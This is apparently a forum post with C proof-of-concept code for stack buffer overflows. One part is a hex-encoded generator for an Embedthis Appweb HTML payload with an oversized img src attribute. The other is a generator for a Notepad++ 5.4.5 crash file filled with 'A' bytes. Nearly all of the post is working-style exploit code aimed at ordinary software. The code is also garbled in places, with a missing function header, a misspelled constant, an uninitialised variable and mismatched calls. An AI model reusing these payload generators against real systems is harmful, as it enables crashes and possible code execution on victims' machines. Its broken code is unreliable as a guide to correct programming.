0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31,

0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,

0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,

0x2C, 0x20, 0x22, 0x5C, 0x5C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65,

0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20,

0x68, 0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65,

0x5F, 0x61, 0x64, 0x29, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F,

0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28,

0x68, 0x65, 0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D,

0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B,

0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B,

0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63,

0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,

0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31,

0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,

0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,

0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28,

0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66,

0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72,

0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29,

0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20,

0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E,

0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x69, 0x74, 0x5B, 0x5D, 0x20, 0x3D, 0x7B, 0x20, 0x30,

0x78, 0x33, 0x43, 0x2C, 0x30, 0x78, 0x36, 0x39, 0x2C, 0x30, 0x78, 0x36, 0x44, 0x2C, 0x30, 0x78,

0x36, 0x37, 0x2C, 0x30, 0x78, 0x32, 0x30, 0x2C, 0x30, 0x78, 0x37, 0x33, 0x2C, 0x30, 0x78, 0x37,

0x32, 0x2C, 0x30, 0x78, 0x36, 0x33, 0x2C, 0x30, 0x78, 0x33, 0x44, 0x20, 0x7D, 0x3B, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,

0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x73,

0x68, 0x69, 0x74, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74,

0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65,

0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74,

0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74,

0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,

0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74, 0x28, 0x6D,

0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C,

0x20, 0x30, 0x78, 0x34, 0x31, 0x2C, 0x20, 0x34, 0x36, 0x31, 0x36, 0x29, 0x3B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x34,

0x36, 0x31, 0x36, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73,

0x65, 0x74, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,

0x73, 0x65, 0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20,

0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79,

0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,

0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65,

0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20,

0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75,

0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C,

0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66,

0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66,

0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79,

0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29,

0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20,

0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29,

0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,

0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,

0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,

0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22,

0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75,

0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C,

0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66,

0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66,

0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C,

0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29,

0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,

0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C,

0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79,

0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,

0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x32,

0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65,

0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x6F, 0x66, 0x66, 0x73,

0x65, 0x74, 0x20, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65, 0x28, 0x22, 0x5C, 0x78, 0x30, 0x30,

0x22, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x22, 0x46, 0x69, 0x6C, 0x65,

0x20, 0x44, 0x6F, 0x6E, 0x65, 0x21, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x7D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x69,

0x6E, 0x28, 0x69, 0x6E, 0x74, 0x20, 0x61, 0x72, 0x67, 0x63, 0x2C, 0x20, 0x63, 0x68, 0x61, 0x72,

0x20, 0x2A, 0x61, 0x72, 0x67, 0x76, 0x5B, 0x5D, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B,

0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x20, 0x3D, 0x20,

0x61, 0x72, 0x67, 0x76, 0x5B, 0x31, 0x5D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x28, 0x22, 0x43, 0x4C, 0x53, 0x22, 0x29, 0x3B, 0x20,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66,

0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74,

0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x45, 0x6D, 0x62, 0x65, 0x64, 0x74, 0x68, 0x69,

0x73, 0x20, 0x41, 0x70, 0x70, 0x77, 0x65, 0x62, 0x20, 0x52, 0x65, 0x6D, 0x6F, 0x74, 0x65, 0x20,

0x53, 0x74, 0x61, 0x63, 0x6B, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x6C, 0x6F, 0x77, 0x20, 0x50,

0x4F, 0x43, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20,

0x2C, 0x20, 0x22, 0x41, 0x6C, 0x6C, 0x20, 0x43, 0x72, 0x65, 0x64, 0x69, 0x74, 0x73, 0x3A, 0x66,

0x6C, 0x30, 0x20, 0x66, 0x6C, 0x30, 0x77, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64,

0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x69, 0x66, 0x28, 0x61, 0x72, 0x67, 0x63, 0x20, 0x3C, 0x20, 0x32, 0x29, 0x20, 0x7B,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28,

0x22, 0x55, 0x73, 0x61, 0x67, 0x65, 0x20, 0x69, 0x73, 0x20, 0x25, 0x73, 0x20, 0x66, 0x69, 0x6C,

0x65, 0x6E, 0x61, 0x6D, 0x65, 0x2E, 0x68, 0x74, 0x6D, 0x6C, 0x5C, 0x6E, 0x22, 0x2C, 0x20, 0x61,

0x72, 0x67, 0x76, 0x5B, 0x30, 0x5D, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x66,

0x6E, 0x61, 0x6D, 0x65, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x72,

0x65, 0x74, 0x75, 0x72, 0x6E, 0x20, 0x30, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,

0x7D, 0x20, 0x20, 0x0D, 0x0A,

} ;

size_t get_executable_path (char* buffer, size_t len)

{

char* path_end;

if (readlink ("/proc/self/exe", buffer, len) <= 0)

return -1;

path_end = strrchr (buffer, '/');

if (path_end == NULL)

return -1;

++path_end;

*path_end = '\0';

return (size_t) (path_end - buffer);

}

#define STRING_SIZE 0xF4240

#define S 0x64

char b[sTRING_SIZE];

memset(b, 0x41, STRING_SIZE);

FILE *f;

f = fopen(fname, "wb");

int i;

for(i = 0; i < S; i++) {

fwrite(b, sizeof(char), STRING_SIZE, f); }

fwrite(V, sizeof(char), strlen(V), f);

checksum(b, STRING_SIZE);

char c[100];

get_executable_path (c, 100);

printf("FILE DONE !\n");

printf("path/location of the crafted file is: %s\n", c);

fclose(f);

}

void args(int argc, char *argv[])

{

int file;

int a;

if(a)

while((a = getopt(argc, argv, "f")) != EOF) {

switch(a) {

case 'f':

file = (int)optarg;

break;

default:

exit(-1);

}

}

}

void Usage(char *argv[])

{ printf("*************************************************\n");

printf("Notepad++ 5.4.5 Stack Buffer Overflow\n");

printf("Usage is:%s [option1] filename\n", argv[0]);

printf("CREDITS:fl0 fl0w\n");

printf("This POC is PRIVATE\n");

printf("*************************************************\n");

}

void Menu(char *argv[])

{ fprintf(stderr,

"\n"

"\t-f FILE.c/cpp\n"

"\n"

,

argv[0]);

exit(-1);

}

int main(int argc, char *argv[])

{ CLS(15);

if(argc < 2) {

Usage(argv);

printf("Example:\n");

Menu(argv[0]);

Usage(argv);

}

args(argc, argv);

Buildfile(argv[2]);

return 0;

}

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...